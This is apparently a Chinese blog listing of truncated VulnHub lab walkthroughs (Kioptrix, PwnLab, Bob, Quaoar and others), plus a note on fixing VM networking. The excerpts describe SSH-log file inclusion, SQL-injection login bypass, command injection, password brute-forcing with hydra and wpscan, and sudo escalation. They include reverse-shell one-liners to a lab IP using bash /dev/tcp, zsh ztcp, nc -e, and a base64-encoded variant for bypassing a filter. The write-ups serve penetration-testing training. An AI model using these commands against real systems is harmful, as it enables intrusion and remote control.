Sword技术分享

运行环境靶机：网络设为桥接，IP地址为192.168.34.154攻击机：同网段下的kali linux，IP地址为192.168.34.153开始渗透：将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中查看当前文件夹下面的内容c2VjcmV0cw==/Swordofgryffindor发现了一个密文可能是lestrange用户的密码c2VjcmV0cw==/.secret.dic文件下发现了一个字符串将这些字符串和之前获取的用户分别写到一个文件当中使用hydry爆破ssh登录密码使用ssh登录成功登录，使用sudo可以利用vim提权，查看vim提权命令成功提权到root找到所有flag

靶机介绍官方下载地址：http://www.vulnhub.com/entry/maskcrafter-11,445/这个靶机有两种办法获取用户，两种办法获取root，不需要暴力破解运行环境：靶机：网络设为NAT模式，IP地址：192.168.174.136攻击机：同网段下的kali linux，IP地址为：192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务这里看到了很多端口一个一个访问先访问21端口的ftp服务将pub目录下的两个文件下载到本地查看NOTES.txt提示1)。请为/调试web目录选择一个更强的密码。用户名为“admin”是可以猜到的，但选择字典密码是一个很大的禁忌。2)。请重新访问SQL代码以防止SQL注入，因为它现在的方式是绝对可怕的。基本上，我们希望并祈祷黑客永远不会发现这一点。根据提示得到用户admin的密码是一个弱密码，而且存在SQL注入查看cred.zip需要解压密码一会再看访问80端口，是一个登录页面，弱密码无法登录扫一下80端口有没有其他目录有很多目录phpmyadmin使用弱密码无法登录robots.txt指向了d ...

下载地址 https://www.vulnhub.com/entry/kioptrix-level-11-2,23 信息搜集扫描IP地址 扫描端口 80端口 万能密码登录用户名：admin’or ‘1’ = ‘1 –+ 密码随便写登录成功 命令执行漏洞输入127.0.0.1 | ls 成功执行命令 反弹shell1234使用bash反弹shellbash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'使用zsh反弹shellzsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.140 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' kali 开启监听浏览器输入：127.0.0.1 | bash -c ‘exec bash -i &>/dev/tcp/192.168 ...

靶机介绍官方下载地址： http://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/靶机难度：容易运行环境靶机：网络设为NAT模式，IP地址：192.168.174.141攻击机：同网段下的kali linux，IP地址：192.168.174.135开始渗透：运行靶机获取靶机地址扫描端口，只有两个端口22端口是ssh服务的80端口是apache2服务的扫描目录web首页是apache服务的sitemap.xml获取了index.htnl文件index.htnl前端没有获取有用的信息，F12查看源码发现隐藏文件cmd.php，怀疑是命令执行的文件将源码的隐藏文件函数删掉，出现了一个输入框 输入命令，提示尝试其他方法将GET传参改成POST传参正常回显了内容查看所有用户查看cmd.php确实是post传参还发现了用户isw0的密码使用获取的用户密码登录ssh服务再isw0用户的家目录里面找到了第一个flag使用sudo发现有很多可以利用的提权命令https://gtfobins.github.io/gtfobins/rpm/网站 ...

下载地址：https://www.vulnhub.com/entry/pwnlab-init,158 信息搜集获取IP地址 端口扫描 80端口在http://192.168.1.179/?page=login页面发现文件包含漏洞在index页面也找到了对应的源码，并且有两个文件包含漏洞另一个是cookie包含文件，也是可以利用成功的在login源码看到有config.php在config.php源码当中发现了数据库的用户名密码之前扫描端口的时候发现开发了3306，使用mysql远程连接查看登录页面的用户名密码使用获取的用户名密码登录，密码需要使用base64解密登录成功，发现上传页面但不允许上传php文件返回文件包含看一下upload的源码，在这里看到了限制方法上传一个图片木马查看图片获得上传路径 getshell这里可以使用之前发现的cookie文件包含执行命令kali开启监听，反弹shell 提权查看用户看到这些用户感觉特别熟悉，使用之前获取的用户名密码登录靶直接切换用户发现shell限制，使用python交互shell，再次切换用户在kane用户的家目录里面找到一个二进制文件这个 ...

靶机介绍官方下载地址：https://www.vulnhub.com/entry/hackfest2016-quaoar,180/通过官方介绍知道了一共有三个flag运行环境：靶机：网络连接方式设为自动桥接，IP地址：192.168.1.84攻击机：通网段下的kali linux，IP地址：192.168.1.37开始渗透运行靶机靶机运行之后就提示了IP地址扫描端口看到有很多端口，先访问80看一下，是两张图片F12查看源代码也没有发现扫一目录，看到了熟悉的wordpress和upload还有robots.txt 进行访问robots.txt指向了wordpressupload是一个目录使用工具扫描，网站确实存在wordpress漏洞使用Wordpress的专用扫描器 wpscan扫出来两个用户，进行爆破wpscan –url http://192.168.1.84/wordpress -e u爆破还是使用wpscanwpscan –url http://192.168.1.84/wordpress -P rockyou.txt -U admin获取密码admin，进入wordpress ...

靶机介绍官方下载地址：http://www.vulnhub.com/entry/m87-1,595/靶机难度容易，拥有两个用户，网络适配器是NAT模式自动分配IP地址运行环境靶机：网络设为NAT，IP地址：192.168.174.138攻击机：同网段下的kali linux，IP地址：192.168.174.135开始渗透运行靶机靶机运行之后就提示了IP地址，端口和一个域名扫一下端口看是否有其他存在扫一下80端口的目录开始访问得到的这些目录80端口的首页admin/admin/backup/9090端口首页找到了四个登录页面http://192.168.174.138/admin/ 输入参数id=’ 出现报错 id=1的时候回显正常 说明存在注入点使用sqlmap跑一下，确实存在注入点在db的数据库的users表当中找到了用户名密码经过多次尝试这里的用户名密码是无法登录任何一个登录页面但是数据库存在flie权限，可以读取文件查看passwd这里看到确实只存在两个用户接下就不知道怎么办了，最后看了某一位大佬的视频才做出来的，将所有用户 ...

靶机介绍官方下载地址：http://www.vulnhub.com/entry/recon-1,438/这是一个基于wprdpress的漏洞，建议使用VirtualBox运行靶机运行环境靶机：网络设为桥接，IP地址：192.168.1.15攻击机：同网段下的kali linux，IP地址：192.168.1.37开始渗透运行靶机获取靶机IP地址扫描端口使用工具扫描，发现存在很多wprdpress的漏洞使用针对wprdpress的工具扫描 wpscan这里获取了两个用户名，将两个用户写到一个文件当中，爆破密码使用获取的用户名密码进行登录登录成功，在Posts选项里面，可以上传zip格式的文件这是一个WordPress插件漏洞参考链接：https://www.freebuf.com/vuls/205735.html将一句话木马压缩成zip格式的文件上传这里需要注意的是压缩包里面必须含有一个html的文件要不然会提示找不到html上传成功之后，使用菜刀或者蚁剑，然后上传反弹shell的php文件这里已经提示了文件上传的位置或者是直接上传反弹shell的php文件开启监听，并访问shell ...

靶机介绍官方下载地址：http://www.vulnhub.com/entry/haclabs-no_name,429/靶机获取shell比较难，提权比较容易，一共有三个flag在用户的家目录里面，需要在virtualbox运行，网络设为桥接运行环境靶机：网络设为桥接，IP地址：192.168.1.91攻击机：同网段下的kali linux，IP地址：192.168.1.37开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开放了一个80端口，扫一下目录开始访问得到的目录80端口的首页，不管输入啥都回显Fake ping wxecutedadmin是一个宣传页面,superadmin.php是一个命令执行的页面查看superadmin.php页面的源码，发现有黑名单过滤目录分隔符被过滤了可以将反弹shell的命令使用base64加密之后再执行源代码：bash -i >& /dev/tcp/192.168.1.37/4444 0>&1加密之后：YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4L ...

靶机介绍官方下载地址：http://www.vulnhub.com/entry/hacknos-reconforce-v11,416/这个靶机有两个flag，难度是中级运行环境靶机：网络设为桥接，IP地址:192.168.1.89攻击机：同网段下的kali linux，IP地址：192.168.1.37开始渗透将靶机运行起来获取靶机IP地址扫描端口及其服务这里获取了21端口是允许ftp登录的 而且是允许Anonymous登录的22端口是ssh服务，密钥加密方式是rsa，80端口是apache的web服务我们这里先尝试使用ftp登录这里获取了提示Security@hackNos可能是一个用户名或者密码查看当前文件夹没有任何东西，而且也没法切换其他目录开始访问web服务，点击TroublesShoot弹出一个登录页面尝试弱密码无法登录，最终使用frp提示的Security@hackNos作为admin用户的密码登录成功发现是一个命令执行的页面，127.0.0.1可以执行成功加上管道符和ls，可以查看当前文件夹下面的内容查看out.php内容，过滤掉了一些特殊字符可以执行系统命令就可以使用w ...

vulnhub靶机导入之后kali扫描不到IP 这种情况一般是靶机没有自动获取IP地址，网卡名称和网卡配置文件里面的名称不一致 问题产生在vulnhub下载靶机，将网段调整为了NAT模式，在kali进行扫描时获取不到靶机IP 解决方案关闭靶机，然后再启动靶机，启动时按shift进入如下页面 然后按e进行编辑 摁↓找到ro，将ro改为 rw single init=/bin/bash 然后按ctrl+x，就可以输入命令了 ip a查看以下实际用的是哪一个网卡 查看网络配置文件/etc/network/interfaces内容，将enp0s3全部改为ens33 保存退出 新版Ubuntu网卡配置文件在 /etc/netplan/XX-installer-config.yaml 然后重启网络即可 这样kali那边使用arp-scan进行扫描就可以获得靶机IP了 最后需要重新启动靶机 Linux重启网卡的三种方法：12345678910111213141516171819202122232425262728一、network利用root帐户# service netwo ...

下载地址：https://www.vulnhub.com/entry/bob-101,226/ 信息搜集扫描IP地址 扫描端口及端口信息访问80端口并没有发现有用的信息 扫描目录看到有熟悉的robots.txt，访问看一下发现了dev_shell.php，可以执行一些简单的命令，但是不能执行ls，ifconfig，pwd等命令 getshell1234bash反弹shellbash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'nc发送一个shell到本地/bin/nc 192.168.1.140 4444 -e /bin/bash 查看用户，看到一共有六个用户拥有登录权限在bob的家目录里的.old_passwordfile.html文件看到了jc用户和seb用户的密码尝试使用这两个用户登录这两个用户也没有啥特殊的权限继续查看bob家目录的文件，从桌面开始找，刚找到Documents就发现了一些小惊喜，login.txt.gpg既然有GPG密文的文件，肯定会有解密的密钥查看一下，还 ...